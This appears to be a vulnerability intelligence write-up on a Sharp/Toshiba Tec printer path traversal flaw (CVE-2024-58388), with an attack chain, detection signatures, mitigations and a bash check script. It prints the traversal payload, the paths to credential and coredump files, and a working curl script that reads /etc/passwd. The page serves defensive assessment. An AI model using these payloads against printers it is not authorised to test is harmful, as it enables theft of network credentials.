Someone left the filing cabinet unlocked in every copy room across 308 printer models, and burglars have been rifling through it for two years
CVE-2024-58388 is an unauthenticated local file inclusion (LFI) vulnerability in the /installed_emanual_down.html endpoint of Sharp multifunction printers (and Toshiba Tec rebrands). By injecting directory traversal sequences into the path parameter — e.g., path=/manual/../../../etc/passwd — any network-adjacent attacker can read arbitrary files from the printer's embedded Linux filesystem without logging in. The impact goes beyond /etc/passwd: coredump files stored on the device contain cleartext credentials including admin passwords, LDAP bind credentials, and SMTP relay secrets. 308 distinct Sharp/Toshiba Tec MFP models across all firmware versions are affected. The CVE was only formally assigned on 2026-10-01, but the underlying flaw has been public since Pierre Kim's June 2024 disclosure and actively exploited since at least July 30, 2024 per Shadowserver telemetry.
Sharp's vendor severity of HIGH (CVSS 3.1: 7.5) is technically accurate for a network-reachable, unauthenticated, zero-interaction information-disclosure bug. Some might argue for a downgrade because the target is 'just a printer,' but that reasoning collapses when you consider what MFPs actually store: LDAP bind credentials, domain service accounts, SMTP relay passwords, and SMB share credentials — all recoverable from coredumps. The two-year gap between public exploitation and CVE assignment is inexcusable and means many defenders have been blind to a vulnerability that threat actors already have Nuclei templates for. The vendor rating holds.
5 steps from start to impact.
Discover MFP web interface
-sV on port 80) reveals these devices. On internal networks, MFPs are almost always on the same VLAN as user workstations or a shared services VLAN.- Network connectivity to the MFP's HTTP/HTTPS port (80/443)
- Most enterprise MFPs are not internet-facing; attacker typically needs internal network access
- Network segmentation or printer VLAN isolation blocks direct access from user endpoints in mature environments
Send path traversal payload
/installed_emanual_down.html?path=/manual/../../../etc/passwd. No authentication, no cookies, no session state required. The endpoint fails to sanitize the path parameter and directly passes the traversal sequence to the underlying filesystem read operation. Weaponized tools: curl, Nuclei (ProjectDiscovery template), or any HTTP client.- HTTP access to the MFP web UI (Step 1)
- None — the exploit is a single GET request with no complexity
../ sequences in URI parameters; Nuclei template CVE-2024-58388 exists for defensive scanningExfiltrate /etc/passwd and system configs
/etc/passwd to enumerate local accounts, then targets configuration files in /mnt/std04/DBMS/uaccnt/ for stored credentials. This confirms the vulnerability and maps the printer's internal account structure.- Successful path traversal (Step 2)
- File contents are printer-local — they do not directly expose domain credentials unless the printer is domain-joined or stores LDAP configs
Download coredump files for credential harvest
/mnt/log/core-main.log.gz.001. These compressed memory dumps contain cleartext credentials — admin passwords, LDAP bind passwords, SMTP relay credentials, and session tokens — because Sharp MFPs store coredumps world-readable and do not scrub sensitive data from process memory before dumping. Pierre Kim's research confirmed recovery of passwords like PASS-PIERRE and service accounts including admin, service, servicefss, sysadmin, deviceaccount.- Successful path traversal (Step 2)
- Coredump files exist on the device (they are generated by crashes and persist across reboots)
- Coredump availability depends on whether the printer has crashed — but MFPs crash frequently enough that coredumps are commonly present
- Files can be large (tens of MB); slow printer NICs make exfiltration noisy
Reuse harvested credentials for lateral movement
- Credentials recovered from coredumps (Step 4)
- Credentials are reusable on other network services (password reuse or shared service accounts)
- Organizations using unique, low-privilege service accounts for printers limit blast radius
- MFA on critical services blocks credential replay
- Password rotation since the last coredump was written invalidates recovered credentials
../ sequences in the path parameter to /installed_emanual_down.html. Snort/Suricata signature: alert http any any -> $PRINTER_NET any (msg:"CVE-2024-58388 Sharp MFP LFI"; content:"installed_emanual_down"; content:"../"; sid:2024583881;). This breaks Step 2. Deploy within 30 days./installed_emanual_down.html via printer admin settings. This eliminates the vulnerable endpoint entirely. Not all models support this — test per model. Deploy within 30 days.- Changing the default admin password does not help — the vulnerability is unauthenticated. The path traversal bypasses all authentication on the e-Manual endpoint.
- Enabling HTTPS on the printer does not help — the vulnerability exists regardless of transport encryption. TLS protects the wire, not the path parameter.
- Print-server-only configurations do not help unless they also disable the web UI entirely — the vulnerable endpoint is in the HTTP management interface, not the print protocol stack.
The supporting signals.
| In-the-Wild Exploitation | Confirmed active. Shadowserver Foundation first observed exploitation on 2024-07-30 — over two years before CVE assignment. Attackers have been scanning for and exploiting this flaw since at least mid-2024. |
|---|---|
| PoC Availability | Public since June 2024. Pierre Kim (@PierreKimSec) published full technical details and working payloads. ProjectDiscovery ships a Nuclei template in the official nuclei-templates repository, enabling one-command mass scanning. |
| EPSS Score | Not yet scored (CVE assigned 2026-10-01; EPSS typically populates within 30 days). Given active exploitation and public PoC, expect high percentile once scored. |
| KEV Status | Not listed on CISA KEV as of 2026-10-02. Given confirmed exploitation since July 2024, KEV addition is overdue. |
| CVSS Vector | CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 HIGH) — unauthenticated, network-reachable, zero-interaction, high confidentiality impact, no integrity/availability impact. CVSS 4.0: 8.7 HIGH. |
| Affected Versions | All firmware versions across 308+ Sharp MFP models (BP series, MX series, DX series) and Toshiba Tec rebranded equivalents. Confirmed on MX-3060N, MX-3561, MX-5070V, MX-M365N, MX-M6071. |
| Fixed Versions | Sharp advises updating to the latest available firmware per model. No single version string applies across all 308 models. Check Sharp's security advisory for per-model firmware versions. Some discontinued models have no patch available. |
| Exposure Data | Over 800,000 printers of all brands are internet-exposed per historical Shodan data. Sharp MFPs represent a fraction, but internal enterprise exposure is near-universal — MFPs sit on user VLANs in most organizations. Shadowserver actively tracks vulnerable instances. |
| Disclosure Timeline | Reported to JPCERT June 2023 → Sharp advisory May 2024 → Pierre Kim full disclosure June 2024 → Active exploitation observed July 2024 → CVE assigned October 2026 (27-month gap). |
| Researcher | Pierre Kim (Pierre Barre, @PierreKimSec) — finder. Shadowserver Foundation — reporter of in-the-wild exploitation. |
Sources.
- Pierre Kim — 17 Vulnerabilities in Sharp MFPs (Full Disclosure)
- SecurityOnline — Sharp Printer Flaw CVE-2024-58388 Exploited in the Wild
- JVNVU#93051062 — Multiple Vulnerabilities in Sharp and Toshiba Tec MFPs
- Sharp Security Advisory — Plural Security Vulnerabilities in MFPs
- Strix.ai — CVE-2024-58388 Intelligence
- ThreatInt — CVE-2024-58388 Details
- ProjectDiscovery Nuclei Templates (GitHub)
Why this verdict
- Active exploitation since July 2024: Shadowserver confirmed in-the-wild exploitation over two years before CVE assignment. This is not theoretical — attackers are actively scanning for and exploiting this flaw with ready-made Nuclei templates.
- Zero-friction exploit chain: The entire attack is a single unauthenticated HTTP GET request. No credentials, no user interaction, no race conditions, no memory corruption. A
curlone-liner is a working exploit. This is as low-complexity as network attacks get. - Credential harvesting extends blast radius beyond the printer: While the direct target is a low-value peripheral, coredump files contain cleartext LDAP bind passwords, SMTP relay credentials, and admin passwords. These enable lateral movement to higher-value targets. The vuln is information disclosure on paper but credential theft in practice.
- Role multiplier: MFPs occupy a *typical-to-low-value role* in enterprise deployments — they are shared office peripherals, not identity infrastructure or data-tier systems. However, MFPs commonly hold LDAP service account credentials with domain read access, making them a credential stepping-stone. In a worst-case scenario (MFP LDAP bind account has excessive privileges, no MFA on downstream targets), the chain extends to domain-level read access — but this requires compounding failures beyond the CVE itself. The blast radius is host-level (printer filesystem) with a credential-pivot path to network-level. This does not trigger the HIGH floor for high-value-role components because MFPs are not canonically high-value infrastructure, but the credential-pivot risk prevents any downgrade below HIGH.
- 308 models, all versions, some unpatched forever: The attack surface is enormous. Discontinued models will never receive patches, creating permanent exposure in organizations that retain older hardware. This breadth prevents any downgrade for limited affected population.
Why not higher?
This is not CRITICAL because the direct impact is information disclosure on a peripheral device, not code execution on identity infrastructure or a data tier. The credential-harvesting chain to lateral movement requires compounding conditions (coredumps present, credentials still valid, no MFA on downstream services) and targets a device class that is not canonically high-value. The Scope is Unchanged in the CVSS vector — the vulnerability cannot directly compromise systems beyond the printer itself.
Why not lower?
This cannot be MEDIUM because it is actively exploited in the wild with a public Nuclei template enabling mass scanning. The exploit requires zero authentication, zero complexity, and zero user interaction. The credential-harvesting angle via coredumps means the real-world impact exceeds pure 'file read on a printer.' Any organization with Sharp MFPs on an accessible network segment is exposed to credential theft, not just printer data leakage.
Crowdsourced verification payload.
Run this script from any host with network access to the target MFP's HTTP port. Invoke as: bash check_cve_2024_58388.sh <printer_ip_or_hostname>. No special privileges required — it makes a single HTTP GET request.
#!/usr/bin/env bash
# check_cve_2024_58388.sh — CVE-2024-58388 Sharp/Toshiba Tec MFP LFI check
# Usage: bash check_cve_2024_58388.sh <target_host> [port]
# Exit codes: 0=VULNERABLE, 1=PATCHED, 2=UNKNOWN
set -euo pipefail
TARGET="${1:-}"
PORT="${2:-80}"
if [[ -z "$TARGET" ]]; then
echo "Usage: $0 <target_host> [port]"
exit 2
fi
URL="http://${TARGET}:${PORT}/installed_emanual_down.html?path=/manual/../../../etc/passwd"
echo "[*] Testing CVE-2024-58388 against ${TARGET}:${PORT}"
echo "[*] Requesting: ${URL}"
HTTP_RESPONSE=$(curl -s -o /tmp/cve2024_58388_resp.txt -w "%{http_code}" \
--connect-timeout 10 --max-time 30 "$URL" 2>/dev/null) || true
if [[ -z "$HTTP_RESPONSE" ]]; then
echo "UNKNOWN — Could not connect to ${TARGET}:${PORT}"
rm -f /tmp/cve2024_58388_resp.txt
exit 2
fi
if [[ "$HTTP_RESPONSE" == "200" ]]; then
# Check if the response contains /etc/passwd-like content
if grep -qE '^root:' /tmp/cve2024_58388_resp.txt 2>/dev/null; then
echo "VULNERABLE — /etc/passwd content returned (HTTP 200)"
echo "[!] Confirmed: CVE-2024-58388 path traversal is exploitable"
echo "[*] First 5 lines of response:"
head -5 /tmp/cve2024_58388_resp.txt
rm -f /tmp/cve2024_58388_resp.txt
exit 0
elif grep -qiE '(nobody|daemon|syslog|messagebus)' /tmp/cve2024_58388_resp.txt 2>/dev/null; then
echo "VULNERABLE — /etc/passwd content detected (HTTP 200)"
rm -f /tmp/cve2024_58388_resp.txt
exit 0
else
echo "UNKNOWN — HTTP 200 returned but content does not match /etc/passwd"
echo "[*] The endpoint exists but may be patched or returning different content"
rm -f /tmp/cve2024_58388_resp.txt
exit 2
fi
elif [[ "$HTTP_RESPONSE" == "403" || "$HTTP_RESPONSE" == "404" ]]; then
echo "PATCHED — Endpoint returned HTTP ${HTTP_RESPONSE} (blocked or removed)"
rm -f /tmp/cve2024_58388_resp.txt
exit 1
elif [[ "$HTTP_RESPONSE" == "301" || "$HTTP_RESPONSE" == "302" ]]; then
echo "UNKNOWN — Redirect received (HTTP ${HTTP_RESPONSE}); may require HTTPS"
echo "[*] Retry with: $0 ${TARGET} 443 (adjust script for HTTPS if needed)"
rm -f /tmp/cve2024_58388_resp.txt
exit 2
else
echo "UNKNOWN — Unexpected HTTP response code: ${HTTP_RESPONSE}"
rm -f /tmp/cve2024_58388_resp.txt
exit 2
fi